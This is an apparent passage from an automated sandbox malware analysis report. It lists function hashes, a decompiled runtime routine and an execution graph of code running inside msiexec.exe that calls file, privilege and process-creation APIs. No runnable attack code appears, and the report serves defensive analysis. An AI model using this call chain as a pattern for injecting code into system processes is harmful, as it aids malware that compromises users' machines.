                      • Opcode Fuzzy Hash: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                      • Instruction Fuzzy Hash: 5B90027131114402E2116169880470600159BD1341F51C421A0855558D86D58891B162
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69730, Relevance: .0, Instructions: 4COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                      • Instruction ID: 41fc6f2be9d9b3c914add4c375e4b6b746089fedf2e3854bc7eb621d312c9217
                      • Opcode Fuzzy Hash: 2cab4f9ac871bd48c2cafca12020ecef17bf90640669bfee708412a3bf8615ea
                      • Instruction Fuzzy Hash: 8F90026160500402E2417169581870600259BD0341F51D021A0055554DC6998A55B6E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00A69670, Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction ID: dce6f95e1f134ab0a79cdc3f723e5afd6aecce0543b1d29046b612bf1790e284
                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00ABFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                      Download Yara Rule
                      C-Code - Quality: 53%
                      			E00ABFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                      0x00abfdda
                      0x00abfde2
                      0x00abfde5
                      0x00abfdec
                      0x00abfdfa
                      0x00abfdff
                      0x00abfe0a
                      0x00abfe0f
                      0x00abfe17
                      0x00abfe1e
                      0x00abfe19
                      0x00abfe19
                      0x00abfe19
                      0x00abfe20
                      0x00abfe21
                      0x00abfe22
                      0x00abfe25
                      0x00abfe40

                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ABFDFA
                      Strings
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00ABFE01
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00ABFE2B
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                      • Instruction ID: 4c6026f4567993a0dca8f7e8eea1f2696076978149833d754e41f9757770f907
                      • Opcode Fuzzy Hash: 6f7e0163ec828fbed7ec1a8b1815ef5265984d09e575b4d53260352fd1fbc5b9
                      • Instruction Fuzzy Hash: 20F0C236604601BFDA211A55DD02FB3BB6EEB45730F240614F628565E2DA62F87097E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Analysis Process: msiexec.exe PID: 1304 Parent PID: 3352 msiexec.exeCOMMON

                      Execution Graph

                      Execution Coverage:4.4%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:591
                      Total number of Limit Nodes:78

                      Graph

                      execution_graph 33746 6df10d 33749 6db9c0 33746->33749 33750 6db9e6 33749->33750 33757 6c9d30 33750->33757 33752 6db9f2 33753 6dba16 33752->33753 33765 6c8f30 33752->33765 33803 6da6a0 33753->33803 33806 6c9c80 33757->33806 33759 6c9d3d 33760 6c9d44 33759->33760 33818 6c9c20 33759->33818 33760->33752 33766 6c8f57 33765->33766 34235 6cb1b0 33766->34235 33768 6c8f69 34239 6caf00 33768->34239 33770 6c8f86 33777 6c8f8d 33770->33777 34310 6cae30 LdrLoadDll 33770->34310 33772 6c90f2 33772->33753 33774 6c8ffc 34255 6cf400 33774->34255 33776 6c9006 33776->33772 33778 6dbf80 LdrLoadDll 33776->33778 33777->33772 34243 6cf370 33777->34243 33779 6c902a 33778->33779 33780 6dbf80 LdrLoadDll 33779->33780 33781 6c903b 33780->33781 33782 6dbf80 LdrLoadDll 33781->33782 33783 6c904c 33782->33783 34267 6cca80 33783->34267 33785 6c9059 33786 6d4a40 7 API calls 33785->33786 33787 6c9066 33786->33787 33788 6d4a40 7 API calls 33787->33788 33789 6c9077 33788->33789 33790 6c9084 33789->33790 33791 6c90a5 33789->33791 34277 6cd610 33790->34277 33793 6d4a40 7 API calls 33791->33793 33799 6c90c1 33793->33799 33796 6c8d00 20 API calls 33796->33772 33797 6c9092 34293 6c8d00 33797->34293 33802 6c90e9 33799->33802 34311 6cd6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33799->34311 33802->33796 33804 6daf50 LdrLoadDll 33803->33804 33805 6da6bf 33804->33805 33807 6c9c93 33806->33807 33857 6d8bb0 LdrLoadDll 33806->33857 33837 6d8a60 33807->33837 33810 6c9ca6 33810->33759 33811 6c9c9c 33811->33810 33840 6db2a0 33811->33840 33813 6c9ce3 33813->33810 33851 6c9aa0 33813->33851 33815 6c9d03 33858 6c9620 LdrLoadDll 33815->33858 33817 6c9d15 33817->33759 34209 6db590 33818->34209 33821 6db590 LdrLoadDll 33822 6c9c4b 33821->33822 33823 6db590 LdrLoadDll 33822->33823 33824 6c9c61 33823->33824 33825 6cf170 33824->33825 33826 6cf189 33825->33826 34217 6cb030 33826->34217 33828 6cf19c 34221 6da1d0 33828->34221 33830 6c9d55 33830->33752 33833 6cf1c2 33834 6cf1ed 33833->33834 34228 6da250 33833->34228 33836 6da480 2 API calls 33834->33836 33836->33830 33859 6da5f0 33837->33859 33841 6db2b9 33840->33841 33872 6d4a40 33841->33872 33843 6db2d1 33844 6db2da 33843->33844 33911 6db0e0 33843->33911 33844->33813 33846 6db2ee 33846->33844 33929 6d9ef0 33846->33929 34186 6c7ea0 33851->34186 33853 6c9ac1 33853->33815 33854 6c9aba 33854->33853 34199 6c8160 33854->34199 33857->33807 33858->33817 33860 6d8a75 33859->33860 33862 6daf50 33859->33862 33860->33811 33863 6daf60 33862->33863 33865 6daf82 33862->33865 33866 6d4e40 33863->33866 33865->33860 33867 6d4e4e 33866->33867 33868 6d4e5a 33866->33868 33867->33868 33871 6d52c0 LdrLoadDll 33867->33871 33868->33865 33870 6d4fac 33870->33865 33871->33870 33873 6d4d75 33872->33873 33874 6d4a54 33872->33874 33873->33843 33874->33873 33937 6d9c40 33874->33937 33877 6d4b80 33940 6da350 33877->33940 33878 6d4b63 33997 6da450 LdrLoadDll 33878->33997 33881 6d4b6d 33881->33843 33882 6d4ba7 33883 6dbdb0 2 API calls 33882->33883 33886 6d4bb3 33883->33886 33884 6d4d39 33887 6da480 2 API calls 33884->33887 33885 6d4d4f 34006 6d4780 LdrLoadDll NtReadFile NtClose 33885->34006 33886->33881 33886->33884 33886->33885 33891 6d4c42 33886->33891 33888 6d4d40 33887->33888 33888->33843 33890 6d4d62 33890->33843 33892 6d4ca9 33891->33892 33894 6d4c51 33891->33894 33892->33884 33893 6d4cbc 33892->33893 33999 6da2d0 33893->33999 33896 6d4c6a 33894->33896 33897 6d4c56 33894->33897 33900 6d4c6f 33896->33900 33901 6d4c87 33896->33901 33998 6d4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33897->33998 33943 6d46e0 33900->33943 33901->33888 33955 6d4400 33901->33955 33903 6d4c60 33903->33843 33905 6d4d1c 34003 6da480 33905->34003 33906 6d4c7d 33906->33843 33909 6d4c9f 33909->33843 33910 6d4d28 33910->33843 33912 6db0f1 33911->33912 33913 6db103 33912->33913 34024 6dbd30 33912->34024 33913->33846 33915 6db124 34029 6d4060 33915->34029 33917 6db170 33917->33846 33918 6db147 33918->33917 33919 6d4060 2 API calls 33918->33919 33921 6db169 33919->33921 33921->33917 34061 6d5380 33921->34061 33922 6db1fa 33923 6db20a 33922->33923 34155 6daef0 LdrLoadDll 33922->34155 34071 6dad60 33923->34071 33926 6db238 34150 6d9eb0 33926->34150 33930 6d9f0c 33929->33930 33931 6daf50 LdrLoadDll 33929->33931 34180 46e967a 33930->34180 33931->33930 33932 6d9f27 33934 6dbdb0 33932->33934 33935 6db349 33934->33935 34183 6da660 33934->34183 33935->33813 33938 6daf50 LdrLoadDll 33937->33938 33939 6d4b34 33938->33939 33939->33877 33939->33878 33939->33881 33941 6da36c NtCreateFile 33940->33941 33942 6daf50 LdrLoadDll 33940->33942 33941->33882 33942->33941 33944 6d46fc 33943->33944 33945 6da2d0 LdrLoadDll 33944->33945 33946 6d471d 33945->33946 33947 6d4738 33946->33947 33948 6d4724 33946->33948 33949 6da480 2 API calls 33947->33949 33950 6da480 2 API calls 33948->33950 33951 6d4741 33949->33951 33952 6d472d 33950->33952 34007 6dbfc0 LdrLoadDll 33951->34007 33952->33906 33954 6d474c 33954->33906 33956 6d447e 33955->33956 33957 6d444b 33955->33957 33958 6d45c9 33956->33958 33962 6d449a 33956->33962 33959 6da2d0 LdrLoadDll 33957->33959 33961 6da2d0 LdrLoadDll 33958->33961 33960 6d4466 33959->33960 33963 6da480 2 API calls 33960->33963 33967 6d45e4 33961->33967 33964 6da2d0 LdrLoadDll 33962->33964 33965 6d446f 33963->33965 33966 6d44b5 33964->33966 33965->33909 33969 6d44bc 33966->33969 33970 6d44d1 33966->33970 34020 6da310 LdrLoadDll 33967->34020 33972 6da480 2 API calls 33969->33972 33973 6d44d6 33970->33973 33977 6d44ec 33970->33977 33971 6d461e 33974 6da480 2 API calls 33971->33974 33975 6d44c5 33972->33975 33976 6da480 2 API calls 33973->33976 33978 6d4629 33974->33978 33975->33909 33979 6d44df 33976->33979 33982 6d44f1 33977->33982 34016 6dbf80 33977->34016 33978->33909 33979->33909 33991 6d4503 33982->33991 34008 6da400 33982->34008 33983 6d4557 33984 6d456e 33983->33984 34019 6da290 LdrLoadDll 33983->34019 33986 6d458a 33984->33986 33987 6d4575 33984->33987 33988 6da480 2 API calls 33986->33988 33989 6da480 2 API calls 33987->33989 33990 6d4593 33988->33990 33989->33991 33992 6d45bf 33990->33992 34011 6dbb80 33990->34011 33991->33909 33992->33909 33994 6d45aa 33995 6dbdb0 2 API calls 33994->33995 33996 6d45b3 33995->33996 33996->33909 33997->33881 33998->33903 34000 6daf50 LdrLoadDll 33999->34000 34001 6d4d04 34000->34001 34002 6da310 LdrLoadDll 34001->34002 34002->33905 34004 6da49c NtClose 34003->34004 34005 6daf50 LdrLoadDll 34003->34005 34004->33910 34005->34004 34006->33890 34007->33954 34009 6da41c NtReadFile 34008->34009 34010 6daf50 LdrLoadDll 34008->34010 34009->33983 34010->34009 34012 6dbb86 34011->34012 34013 6dbba4 34012->34013 34014 6dbf80 LdrLoadDll 34012->34014 34013->33994 34015 6dbbbb 34014->34015 34015->33994 34021 6da620 34016->34021 34018 6dbf98 34018->33982 34019->33984 34020->33971 34022 6daf50 LdrLoadDll 34021->34022 34023 6da63c 34022->34023 34023->34018 34025 6dbd5d 34024->34025 34156 6da530 LdrLoadDll 34024->34156 34025->33915 34157 6da570 LdrLoadDll 34025->34157 34028 6dbd95 34028->33915 34030 6d4071 34029->34030 34031 6d4079 34029->34031 34030->33918 34060 6d434c 34031->34060 34158 6dcf20 34031->34158 34033 6d40cd 34034 6dcf20 LdrLoadDll 34033->34034 34038 6d40d8 34034->34038 34035 6d4126 34037 6dcf20 LdrLoadDll 34035->34037 34041 6d413a 34037->34041 34038->34035 34166 6dcfc0 LdrLoadDll RtlFreeHeap 34038->34166 34167 6dd050 34038->34167 34040 6d4197 34042 6dcf20 LdrLoadDll 34040->34042 34041->34040 34044 6dd050 2 API calls 34041->34044 34043 6d41ad 34042->34043 34045 6d41ea 34043->34045 34047 6dd050 2 API calls 34043->34047 34044->34041 34046 6dcf20 LdrLoadDll 34045->34046 34048 6d41f5 34046->34048 34047->34043 34049 6dd050 2 API calls 34048->34049 34056 6d422f 34048->34056 34049->34048 34052 6dcf80 2 API calls 34053 6d432e 34052->34053 34054 6dcf80 2 API calls 34053->34054 34055 6d4338 34054->34055 34057 6dcf80 2 API calls 34055->34057 34163 6dcf80 34056->34163 34058 6d4342 34057->34058 34059 6dcf80 2 API calls 34058->34059 34059->34060 34060->33918 34062 6d5391 34061->34062 34063 6d4a40 7 API calls 34062->34063 34065 6d53a7 34063->34065 34064 6d53fa 34064->33922 34065->34064 34066 6d53f5 34065->34066 34067 6d53e2 34065->34067 34069 6dbdb0 2 API calls 34066->34069 34068 6dbdb0 2 API calls 34067->34068 34070 6d53e7 34068->34070 34069->34064 34070->33922 34173 6dac20 34071->34173 34074 6dac20 LdrLoadDll 34075 6dad7d 34074->34075 34076 6dac20 LdrLoadDll 34075->34076 34077 6dad86 34076->34077 34078 6dac20 LdrLoadDll 34077->34078 34079 6dad8f 34078->34079 34080 6dac20 LdrLoadDll 34079->34080 34081 6dad98 34080->34081 34082 6dac20 LdrLoadDll 34081->34082 34083 6dada1 34082->34083 34084 6dac20 LdrLoadDll 34083->34084 34085 6dadad 34084->34085 34086 6dac20 LdrLoadDll 34085->34086 34087 6dadb6 34086->34087 34088 6dac20 LdrLoadDll 34087->34088 34089 6dadbf 34088->34089 34090 6dac20 LdrLoadDll 34089->34090 34091 6dadc8 34090->34091 34092 6dac20 LdrLoadDll 34091->34092 34093 6dadd1 34092->34093 34094 6dac20 LdrLoadDll 34093->34094 34095 6dadda 34094->34095 34096 6dac20 LdrLoadDll 34095->34096 34097 6dade6 34096->34097 34098 6dac20 LdrLoadDll 34097->34098 34099 6dadef 34098->34099 34100 6dac20 LdrLoadDll 34099->34100 34101 6dadf8 34100->34101 34102 6dac20 LdrLoadDll 34101->34102 34103 6dae01 34102->34103 34104 6dac20 LdrLoadDll 34103->34104 34105 6dae0a 34104->34105 34106 6dac20 LdrLoadDll 34105->34106 34107 6dae13 34106->34107 34108 6dac20 LdrLoadDll 34107->34108 34109 6dae1f 34108->34109 34110 6dac20 LdrLoadDll 34109->34110 34111 6dae28 34110->34111 34112 6dac20 LdrLoadDll 34111->34112 34113 6dae31 34112->34113 34114 6dac20 LdrLoadDll 34113->34114 34115 6dae3a 34114->34115 34116 6dac20 LdrLoadDll 34115->34116 34117 6dae43 34116->34117 34118 6dac20 LdrLoadDll 34117->34118 34119 6dae4c 34118->34119 34120 6dac20 LdrLoadDll 34119->34120 34121 6dae58 34120->34121 34122 6dac20 LdrLoadDll 34121->34122 34123 6dae61 34122->34123 34124 6dac20 LdrLoadDll 34123->34124 34125 6dae6a 34124->34125 34126 6dac20 LdrLoadDll 34125->34126 34127 6dae73 34126->34127 34128 6dac20 LdrLoadDll 34127->34128 34129 6dae7c 34128->34129 34130 6dac20 LdrLoadDll 34129->34130 34131 6dae85 34130->34131 34132 6dac20 LdrLoadDll 34131->34132 34133 6dae91 34132->34133 34134 6dac20 LdrLoadDll 34133->34134 34135 6dae9a 34134->34135 34136 6dac20 LdrLoadDll 34135->34136 34137 6daea3 34136->34137 34138 6dac20 LdrLoadDll 34137->34138 34139 6daeac 34138->34139 34140 6dac20 LdrLoadDll 34139->34140 34141 6daeb5 34140->34141 34142 6dac20 LdrLoadDll 34141->34142 34143 6daebe 34142->34143 34144 6dac20 LdrLoadDll 34143->34144 34145 6daeca 34144->34145 34146 6dac20 LdrLoadDll 34145->34146 34147 6daed3 34146->34147 34148 6dac20 LdrLoadDll 34147->34148 34149 6daedc 34148->34149 34149->33926 34151 6daf50 LdrLoadDll 34150->34151 34152 6d9ecc 34151->34152 34179 46e9860 LdrInitializeThunk 34152->34179 34153 6d9ee3 34153->33846 34155->33923 34156->34025 34157->34028 34159 6dcf36 34158->34159 34160 6dcf30 34158->34160 34161 6dbf80 LdrLoadDll 34159->34161 34160->34033 34162 6dcf5c 34161->34162 34162->34033 34164 6d4324 34163->34164 34165 6dbdb0 2 API calls 34163->34165 34164->34052 34165->34164 34166->34038 34168 6dcfc0 34167->34168 34169 6dbf80 LdrLoadDll 34168->34169 34170 6dd01d 34168->34170 34171 6dcffa 34169->34171 34170->34038 34172 6dbdb0 2 API calls 34171->34172 34172->34170 34174 6dac3b 34173->34174 34175 6d4e40 LdrLoadDll 34174->34175 34176 6dac5b 34175->34176 34177 6d4e40 LdrLoadDll 34176->34177 34178 6dad07 34176->34178 34177->34178 34178->34074 34179->34153 34181 46e968f LdrInitializeThunk 34180->34181 34182 46e9681 34180->34182 34181->33932 34182->33932 34184 6daf50 LdrLoadDll 34183->34184 34185 6da67c RtlFreeHeap 34184->34185 34185->33935 34187 6c7eab 34186->34187 34188 6c7eb0 34186->34188 34187->33854 34189 6dbd30 LdrLoadDll 34188->34189 34192 6c7ed5 34189->34192 34190 6c7f38 34190->33854 34191 6d9eb0 2 API calls 34191->34192 34192->34190 34192->34191 34193 6c7f3e 34192->34193 34198 6dbd30 LdrLoadDll 34192->34198 34203 6da5b0 34192->34203 34194 6c7f64 34193->34194 34196 6da5b0 2 API calls 34193->34196 34194->33854 34197 6c7f55 34196->34197 34197->33854 34198->34192 34200 6c8176 34199->34200 34201 6da5b0 2 API calls 34200->34201 34202 6c817e 34201->34202 34202->33815 34204 6da5cc 34203->34204 34205 6daf50 LdrLoadDll 34203->34205 34208 46e96e0 LdrInitializeThunk 34204->34208 34205->34204 34206 6da5e3 34206->34192 34208->34206 34210 6db5b3 34209->34210 34213 6cace0 34210->34213 34214 6cad04 34213->34214 34215 6c9c3a 34214->34215 34216 6cad40 LdrLoadDll 34214->34216 34215->33821 34216->34215 34219 6cb053 34217->34219 34218 6cb0d0 34218->33828 34219->34218 34233 6d9c80 LdrLoadDll 34219->34233 34222 6da1da 34221->34222 34223 6daf50 LdrLoadDll 34222->34223 34224 6cf1ab 34223->34224 34224->33830 34225 6da7c0 34224->34225 34226 6daf50 LdrLoadDll 34225->34226 34227 6da7df LookupPrivilegeValueW 34226->34227 34227->33833 34229 6da26c 34228->34229 34230 6daf50 LdrLoadDll 34228->34230 34234 46e9910 LdrInitializeThunk 34229->34234 34230->34229 34231 6da28b 34231->33834 34233->34218 34234->34231 34236 6cb1e0 34235->34236 34237 6cb030 LdrLoadDll 34236->34237 34238 6cb1f4 34237->34238 34238->33768 34240 6caf24 34239->34240 34312 6d9c80 LdrLoadDll 34240->34312 34242 6caf5e 34242->33770 34244 6cf39c 34243->34244 34245 6cb1b0 LdrLoadDll 34244->34245 34246 6cf3ae 34245->34246 34313 6cf280 34246->34313 34249 6cf3c9 34251 6cf3d4 34249->34251 34253 6da480 2 API calls 34249->34253 34250 6cf3e1 34252 6cf3f2 34250->34252 34254 6da480 2 API calls 34250->34254 34251->33774 34252->33774 34253->34251 34254->34252 34256 6cf42c 34255->34256 34332 6cb2a0 34256->34332 34258 6cf43e 34259 6cf280 3 API calls 34258->34259 34260 6cf44f 34259->34260 34261 6cf459 34260->34261 34262 6cf471 34260->34262 34263 6da480 2 API calls 34261->34263 34265 6cf464 34261->34265 34264 6da480 2 API calls 34262->34264 34266 6cf482 34262->34266 34263->34265 34264->34266 34265->33776 34266->33776 34268 6cca96 34267->34268 34269 6ccaa0 34267->34269 34268->33785 34270 6caf00 LdrLoadDll 34269->34270 34271 6ccb3e 34270->34271 34272 6ccb64 34271->34272 34273 6cb030 LdrLoadDll 34271->34273 34272->33785 34274 6ccb80 34273->34274 34275 6d4a40 7 API calls 34274->34275 34276 6ccbd5 34275->34276 34276->33785 34278 6cd636 34277->34278 34279 6cb030 LdrLoadDll 34278->34279 34280 6cd64a 34279->34280 34336 6cd300 34280->34336 34282 6c908b 34283 6ccbf0 34282->34283 34284 6ccc16 34283->34284 34285 6cb030 LdrLoadDll 34284->34285 34286 6ccc99 34284->34286 34285->34286 34287 6cb030 LdrLoadDll 34286->34287 34288 6ccd06 34287->34288 34289 6caf00 LdrLoadDll 34288->34289 34290 6ccd6f 34289->34290 34291 6cb030 LdrLoadDll 34290->34291 34292 6cce1f 34291->34292 34292->33797 34295 6c8d14 34293->34295 34365 6cf6c0 34293->34365 34296 6c8f25 34295->34296 34370 6d4390 34295->34370 34296->33753 34298 6c8d70 34298->34296 34374 6c8ab0 34298->34374 34301 6dcf20 LdrLoadDll 34302 6c8db2 34301->34302 34303 6dd050 2 API calls 34302->34303 34308 6c8dc7 34303->34308 34304 6c7ea0 3 API calls 34304->34308 34307 6cc7a0 15 API calls 34307->34308 34308->34296 34308->34304 34308->34307 34309 6c8160 2 API calls 34308->34309 34379 6cf660 34308->34379 34383 6cf070 18 API calls 34308->34383 34309->34308 34310->33777 34311->33802 34312->34242 34314 6cf29a 34313->34314 34322 6cf350 34313->34322 34315 6cb030 LdrLoadDll 34314->34315 34316 6cf2bc 34315->34316 34323 6d9f30 34316->34323 34318 6cf2fe 34326 6d9f70 34318->34326 34321 6da480 2 API calls 34321->34322 34322->34249 34322->34250 34324 6daf50 LdrLoadDll 34323->34324 34325 6d9f4c 34324->34325 34325->34318 34327 6d9f8c 34326->34327 34328 6daf50 LdrLoadDll 34326->34328 34331 46e9fe0 LdrInitializeThunk 34327->34331 34328->34327 34329 6cf344 34329->34321 34331->34329 34333 6cb2c7 34332->34333 34334 6cb030 LdrLoadDll 34333->34334 34335 6cb303 34334->34335 34335->34258 34337 6cd317 34336->34337 34345 6cf700 34337->34345 34341 6cd38b 34342 6cd392 34341->34342 34356 6da290 LdrLoadDll 34341->34356 34342->34282 34344 6cd3a5 34344->34282 34346 6cf725 34345->34346 34357 6c81a0 34346->34357 34348 6cf749 34349 6d4a40 7 API calls 34348->34349 34351 6cd35f 34348->34351 34352 6dbdb0 2 API calls 34348->34352 34364 6cf540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 34348->34364 34349->34348 34353 6da6d0 34351->34353 34352->34348 34354 6daf50 LdrLoadDll 34353->34354 34355 6da6ef CreateProcessInternalW 34354->34355 34355->34341 34356->34344 34358 6c829f 34357->34358 34359 6c81b5 34357->34359 34358->34348 34359->34358 34360 6d4a40 7 API calls 34359->34360 34361 6c8222 34360->34361 34362 6dbdb0 2 API calls 34361->34362 34363 6c8249 34361->34363 34362->34363 34363->34348 34364->34348 34366 6d4e40 LdrLoadDll 34365->34366 34367 6cf6df 34366->34367 34368 6cf6ed 34367->34368 34369 6cf6e6 SetErrorMode 34367->34369 34368->34295 34369->34368 34371 6d43af 34370->34371 34384 6cf490 34371->34384 34373 6d43b6 34373->34298 34375 6dbd30 LdrLoadDll 34374->34375 34377 6c8ad5 34375->34377 34376 6c8cea 34376->34301 34377->34376 34403 6d9870 34377->34403 34380 6cf673 34379->34380 34451 6d9e80 34380->34451 34383->34308 34385 6cf4ad 34384->34385 34391 6d9fb0 34385->34391 34388 6cf4f5 34388->34373 34392 6daf50 LdrLoadDll 34391->34392 34393 6d9fcc 34392->34393 34401 46e99a0 LdrInitializeThunk 34393->34401 34394 6cf4ee 34394->34388 34396 6da000 34394->34396 34397 6daf50 LdrLoadDll 34396->34397 34398 6da01c 34397->34398 34402 46e9780 LdrInitializeThunk 34398->34402 34399 6cf51e 34399->34373 34401->34394 34402->34399 34404 6dbf80 LdrLoadDll 34403->34404 34405 6d9887 34404->34405 34424 6c9310 34405->34424 34407 6d98a2 34408 6d98c9 34407->34408 34409 6d98e0 34407->34409 34410 6dbdb0 2 API calls 34408->34410 34411 6dbd30 LdrLoadDll 34409->34411 34412 6d98d6 34410->34412 34413 6d991a 34411->34413 34412->34376 34414 6dbd30 LdrLoadDll 34413->34414 34415 6d9933 34414->34415 34416 6d9bd4 34415->34416 34430 6dbd70 LdrLoadDll 34415->34430 34422 6dbdb0 2 API calls 34416->34422 34418 6d9bb9 34418->34416 34419 6d9bc0 34418->34419 34420 6dbdb0 2 API calls 34419->34420 34421 6d9bca 34420->34421 34421->34376 34423 6d9c29 34422->34423 34423->34376 34425 6c9335 34424->34425 34426 6cace0 LdrLoadDll 34425->34426 34427 6c9368 34426->34427 34429 6c938d 34427->34429 34431 6ccf10 34427->34431 34429->34407 34430->34418 34432 6ccf3c 34431->34432 34433 6da1d0 LdrLoadDll 34432->34433 34434 6ccf55 34433->34434 34435 6ccf5c 34434->34435 34442 6da210 34434->34442 34435->34429 34439 6ccf97 34440 6da480 2 API calls 34439->34440 34441 6ccfba 34440->34441 34441->34429 34443 6da22c 34442->34443 34444 6daf50 LdrLoadDll 34442->34444 34450 46e9710 LdrInitializeThunk 34443->34450 34444->34443 34445 6ccf7f 34445->34435 34447 6da800 34445->34447 34448 6da81f 34447->34448 34449 6daf50 LdrLoadDll 34447->34449 34448->34439 34449->34448 34450->34445 34452 6d9e9c 34451->34452 34453 6daf50 LdrLoadDll 34451->34453 34456 46e9840 LdrInitializeThunk 34452->34456 34453->34452 34454 6cf69e 34454->34308 34456->34454 34457 6d9070 34458 6dbd30 LdrLoadDll 34457->34458 34460 6d90ab 34457->34460 34458->34460 34459 6d918c 34460->34459 34461 6cace0 LdrLoadDll 34460->34461 34462 6d90e1 34461->34462 34463 6d4e40 LdrLoadDll 34462->34463 34465 6d90fd 34463->34465 34464 6d9110 Sleep 34464->34465 34465->34459 34465->34464 34468 6d8c90 LdrLoadDll 34465->34468 34469 6d8ea0 LdrLoadDll 34465->34469 34468->34465 34469->34465 34470 46e9540 LdrInitializeThunk

                      Executed Functions

                      Function 006DA34A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 287 6da34a-6da3a1 call 6daf50 NtCreateFile
                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,006D4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006D4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 006DA39D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      • Opcode ID: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                      • Instruction ID: 68ff250cc482efac20ba0868bf9f117fe0f29662e63a2e1617f7f60679012e23
                      • Opcode Fuzzy Hash: c0e56e0d9cc9a6916effb2bdfe839b2cd039b9d22b91e97cf9b0dc550c7ab15c
                      • Instruction Fuzzy Hash: 8E01B2B2204108AFCB58CF99DC85EEB77A9AF8C754F15824CFA5D97291C630E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA350, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 290 6da350-6da366 291 6da36c-6da3a1 NtCreateFile 290->291 292 6da367 call 6daf50 290->292 292->291
                      APIs
                      • NtCreateFile.NTDLL(00000060,00000000,.z`,006D4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,006D4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 006DA39D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID: .z`
                      • API String ID: 823142352-1441809116
                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                      • Instruction ID: c8dbfd3132b04056ef19d92569d7f948fe32d63aecd5f94acb2cabb10ad42947
